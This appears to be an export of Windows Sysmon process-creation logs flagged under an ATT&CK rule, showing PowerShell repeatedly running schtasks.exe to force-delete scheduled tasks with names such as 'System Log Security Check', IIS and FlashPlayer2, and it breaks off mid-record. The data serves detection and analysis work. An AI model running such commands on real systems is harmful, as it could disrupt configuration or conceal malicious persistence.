Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.373004300Z"",""eventRecordID"":""2497"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.370\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001009931e00}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.370"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001009931e00}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.230",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.339 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c911e00} +ProcessId: 3572 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.342433900Z"",""eventRecordID"":""2496"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.339\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c911e00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.339"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00102c911e00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.213",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.311 +ProcessGuid: 
{df9fc3d3-b37c-5ecf-0000-00105b8f1e00} +ProcessId: 1412 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.313550500Z"",""eventRecordID"":""2495"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.311\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105b8f1e00}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.311"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105b8f1e00}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.198",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.290 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010978d1e00} +ProcessId: 1344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.292753700Z"",""eventRecordID"":""2494"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.290\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010978d1e00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.290"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010978d1e00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.182",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.265 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105e8b1e00} +ProcessId: 5800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.269056800Z"",""eventRecordID"":""2493"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.265\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105e8b1e00}\r\nProcessId: 5800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.265"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105e8b1e00}"",""processId"":""5800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.151",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.235 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001053891e00} +ProcessId: 6864 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.238500300Z"",""eventRecordID"":""2492"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.235\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001053891e00}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.235"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001053891e00}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.134",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.206 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001078871e00} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
